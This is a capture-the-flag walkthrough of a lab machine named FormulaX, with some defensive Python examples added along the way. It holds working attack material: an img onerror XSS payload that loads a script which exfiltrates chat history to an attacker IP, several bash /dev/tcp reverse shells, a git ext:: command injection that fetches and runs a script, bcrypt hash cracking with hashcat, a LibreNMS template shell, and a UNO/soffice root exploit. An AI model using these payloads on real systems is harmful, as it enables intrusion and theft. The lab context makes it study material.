🏎️

formulax

Nmap scan of the target:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA)
|_  256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was /static/index.html
|_http-cors: GET POST
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Register an account: ivan@gmail.com:123456
Type help in the chatbot.
Test whether the register page is vulnerable to second-order SQL injection.
No: every special character is filtered except `@`.
Base64-decoding the cookie reveals a JWT:
Cookie: authorization=Bearer%20{"alg":"HS256","typ":"JWT"}.{"userID":"65effe4fa686df483ce47da7","iat":1710227146}.McTjCzxd8w26XRWH18qDyahlUpgqI-ZA1EAA_NI-KZM
The signing algorithm is HS256.
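As an added check (not code from this write-up), the following Python decodes a cookie of this shape without verifying it and lists what a reviewer would flag. Its sample input is the admin token shown in the MongoDB dump on this page; the function names are mine.

```python
import base64
import json
from urllib.parse import unquote

# Sample input: the admin authorization_token from the MongoDB dump on this page.
SAMPLE_COOKIE = (
    "authorization=Bearer%20"
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTAyOTE2NTF9."
    "LSLn0klkH_MWk5-iMr2fPjDzcklg6sSrg-037lP6iIY"
)


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def inspect_jwt_cookie(cookie: str) -> dict:
    """Decode (without verifying) the JWT carried in an authorization cookie
    and list the weaknesses a reviewer would flag. Hypothetical helper."""
    value = unquote(cookie.split("=", 1)[1])          # strip the cookie name, undo %20
    if value.startswith("Bearer "):
        value = value[len("Bearer "):]
    parts = value.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected header.payload.signature")
    header = json.loads(_b64url_decode(parts[0]))
    payload = json.loads(_b64url_decode(parts[1]))

    findings = []
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":
        findings.append("alg=none: unsigned token; only accepted by a misconfigured verifier")
    elif alg.startswith("HS"):
        findings.append("HS* algorithm: one shared secret signs every token; the server must pin alg")
    if "exp" not in payload:
        findings.append("no exp claim: the token never expires (only iat is present)")
    if not parts[2]:
        findings.append("empty signature")
    return {"header": header, "payload": payload, "findings": findings}
```

Run on the page's token it reports the HS256 choice and, more importantly, that the token carries only iat and no exp, so a leaked cookie stays valid indefinitely.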
Test for XSS. It seems <script> is filtered.
Try another vector: serve a script locally and load it from an img onerror handler.
php -S 0.0.0.0:80
<img SRC=p onerror="var script1 = document.createElement('script'); script1.src='http://10.10.16.23/test.js';document.head.appendChild(script1);" />
It works.
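Why stripping <script> does not stop this: an added example (not the target's code) contrasting such a blocklist with output encoding, using the page's own payload as input. Function names are mine.

```python
import html
import re

# Constructed sample inputs: the onerror payload from this page and a plain script tag.
IMG_PAYLOAD = (
    "<img SRC=p onerror=\"var script1 = document.createElement('script'); "
    "script1.src='http://10.10.16.23/test.js';"
    "document.head.appendChild(script1);\" />"
)
SCRIPT_PAYLOAD = "<script>alert(1)</script>"

# Markup a browser would execute: a script tag, or any tag carrying an on* handler.
ACTIVE_MARKUP = re.compile(r"<\s*script\b|<[a-z][^>]*\bon[a-z]+\s*=", re.IGNORECASE)


def blocklist_filter(text: str) -> str:
    """The kind of filter the page ran into: drop <script> tags and nothing else."""
    return re.sub(r"</?script\b[^>]*>", "", text, flags=re.IGNORECASE)


def render_safe(text: str) -> str:
    """Output encoding: '<', '>', '&' and quotes become entities, so the browser
    shows the text literally whatever tag or handler it names."""
    return html.escape(text, quote=True)


def still_executable(rendered: str) -> bool:
    """True if the string, as it would reach the browser, still contains active markup."""
    return ACTIVE_MARKUP.search(rendered) is not None
```

The blocklist neutralises the script tag but leaves the img/onerror payload untouched, while encoding neutralises both.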
In the chatbox I can see it uses socket.io, and the chat history can be retrieved.
socket.io.js:
Write test.js as a listener: it loads the site's own socket.io client, requests the history and forwards each message to my server.
// load the site's socket.io client
const script = document.createElement('script');
script.src = '/socket.io/socket.io.js';
document.head.appendChild(script);
script.addEventListener('load', function () {
  const res = axios.get(`/user/api/chat`);
  // open a socket that carries the victim's cookies
  const socket = io('/', { withCredentials: true });
  // forward every received message, base64-encoded, to the listener
  socket.on('message', (my_message) => {
    fetch("http://10.10.16.23:8000/?d=" + btoa(my_message));
  });
  // ask the bot for the chat history
  socket.emit('client_message', 'history');
});
Start the listener and the script server:
php -S 0.0.0.0:8080
php -S 0.0.0.0:80
Send the payload through “Contact_us” again:
The chat history is received, base64-encoded:
V3JpdGUgYSBzY3JpcHQgZm9yICBkZXYtZ2l0LWF1dG8tdXBkYXRlLmNoYXRib3QuaHRiIHRvIHdvcmsgcHJvcGVybHk=
It decodes to “Write a script for dev-git-auto-update.chatbot.htb to work properly”, which reveals the subdomain dev-git-auto-update.chatbot.htb.
echo "10.129.237.125 dev-git-auto-update.chatbot.htb" >>/etc/hosts
The page shows it runs upsimple-git v3.14.
Searching on Google for known issues:
ext::sh -c bash -i >& /dev/tcp/10.10.16.23/6666 0>&1
That does not work.
Create rev.sh:
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.16.23/6666 0>&1"
php -S 0.0.0.0:8000
ext::sh -c curl% http://10.10.16.23:8000/rev.sh|bash >&2
Catch the reverse shell.
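The server-side fix is to never hand an unvalidated URL to git clone. Added example, not the application's code: an allow-list check that rejects remote-helper transports such as the ext:: string above, option injection and local paths, run over constructed sample URLs (function names are mine).

```python
import re
from urllib.parse import urlsplit

# Schemes an auto-update service has any business cloning from.
ALLOWED_SCHEMES = {"https", "ssh", "git"}

# Constructed sample inputs mapped to the verdict we expect for each.
SAMPLE_URLS = {
    "https://example.invalid/team/app.git": True,
    "git@example.invalid:team/app.git": True,
    "ext::sh -c curl% http://10.10.16.23:8000/rev.sh|bash >&2": False,  # this page's payload
    "--upload-pack=touch /tmp/pwned": False,                           # option injection
    "file:///etc": False,                                               # local path
}

SCP_LIKE = re.compile(r"^[\w.-]+@[\w.-]+:[\w./-]+$")


def is_safe_git_url(url: str) -> bool:
    """Allow-list check to run before a user-supplied URL reaches git clone.
    Rejects <transport>::<address> remote helpers (ext::, fd::), local paths,
    and anything git could parse as a command-line option."""
    url = url.strip()
    if not url or url.startswith("-"):
        return False                      # would be parsed as a git option
    if "::" in url.split("/", 1)[0]:
        return False                      # remote-helper syntax, e.g. ext::
    if SCP_LIKE.match(url):
        return True                       # user@host:path form
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def audit_samples() -> dict:
    """Apply the check to every sample URL; returns {url: verdict}."""
    return {u: is_safe_git_url(u) for u in SAMPLE_URLS}
```

Independently of input validation, git's protocol.ext.allow setting can be set to never so the ext helper is refused even if a URL slips through.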
File enumeration under /var:
MongoDB is installed.
show dbs
use testing
show collections
There are two collections in the testing database. List all users:
db.users.find()
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTAyOTE2NTF9.LSLn0klkH_MWk5-iMr2fPjDzcklg6sSrg-037lP6iIY", "__v" : 0 }
{ "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
Two bcrypt hashes found. Save them to a file and try to recover them with hashcat:
admin:$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.
frank_dorky:$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6
Hash cracking:
hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --username
The recovered credential:
frank_dorky:manchesterunited
ssh frank_dorky@10.129.237.125
Got initial access!
frank_dorky has no sudo rights.
Run linpeas.
/usr/bin/python3.10 is highlighted with cap_net_raw=eip, but that is irrelevant here.
Some unusual ports are listening locally; forward one of them:
ssh -L 3001:127.0.0.1:3000 frank_dorky@10.129.237.125
It is LibreNMS.
Googling finds no privilege escalation exploit.
No access permission.
Found an article about bypassing the LibreNMS permission limitation:
./adduser.php test test 10
Logging in with test:test shows an error prompt.
Check the debugging output.
Here I need to change the forwarded local port from 3001 to 3000, so I switch to Kali Linux:
echo "127.0.0.1 librenms.com" >> /etc/hosts
ssh -L 3000:127.0.0.1:3000 frank_dorky@10.129.237.125
Access http://librenms.com:3000
Enumerating the application, I found templates.
Reading this article:
@php system("bash -c 'bash -i >& /dev/tcp/10.10.16.23/6666 0>&1'");@endphp
Write a reverse shell into a template; it is executed automatically.
Got a shell as user librenms.
Check the environment variables:
env
Password found: mychemicalformulaX
Try this password for user kai_relay:
ssh kai_relay@10.129.237.125
kai_relay can run /usr/bin/office.sh with sudo:
#!/bin/bash
/usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --nodefault --headless
The script starts OpenOffice Calc headless and accepts UNO API connections on localhost port 2002.
Search Google for an exploit:
import uno
from com.sun.star.system import XSystemShellExecute
import argparse

parser = argparse.ArgumentParser()
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
args = parser.parse_args()

# Define the UNO component
localContext = uno.getComponentContext()

# Define the resolver to use, this is used to connect with the API
resolver = localContext.ServiceManager.createInstanceWithContext(
    "com.sun.star.bridge.UnoUrlResolver", localContext
)

# Connect with the provided host on the provided target port
print("[+] Connecting to target...")
context = resolver.resolve(
    "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host, args.port))

# Use the service manager to spawn the SystemShellExecute module and run a command through it
service_manager = context.ServiceManager
print("[+] Connected to {0}".format(args.host))
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("cat", '/root/root.txt', 1)

Start the office listener as root, then run the script against it:
sudo /usr/bin/office.sh
python3 exp.py --host 127.0.0.1 --port 2002
Got the root flag!